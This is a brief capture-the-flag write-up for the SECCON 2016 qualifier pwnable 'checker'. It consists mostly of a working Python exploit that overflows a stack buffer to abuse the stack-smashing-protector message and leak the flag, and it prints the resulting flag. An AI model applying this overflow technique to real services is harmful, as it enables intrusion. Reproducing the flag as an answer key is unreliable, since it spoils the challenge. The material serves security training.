SECCON CTF QUAL 2016 - checker

Category : Pwnables 

checker

Summary : memory leak with SSP protection

Exploit

#!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch):     res = ''     while ch not in res:         res += s.recv(1)     return res p = lambda x : pack("<L", x) up = lambda x : unpack("<L", x)[0] HOST = 'checker.pwn.seccon.jp' PORT = 14726 target = "a"*0x178+"\xc0\x10\x60\x00\x00\x00\x00\x00" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) rc(s, 'NAME : ') s.send('pwn3r\n') rc(s, '>> ') s.send('a'*(len(target) - 1)+'\n') rc(s, '>> ') s.send('a'*(len(target) - 2)+'\n') rc(s, '>> ') s.send('a'*(len(target) - 3)+'\n') rc(s, '>> ') s.send('a'*(len(target) - 4)+'\n') rc(s, '>> ') s.send(target[:0x178+3]+'\n') rc(s, '>> ') s.send('yes'+'\n') rc(s, 'FLAG : ') s.send('gogo\n') time.sleep(1) print s.recv(1024) s.close() """     pwn3r$ python check_exploit.py     You are a liar...     *** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated      """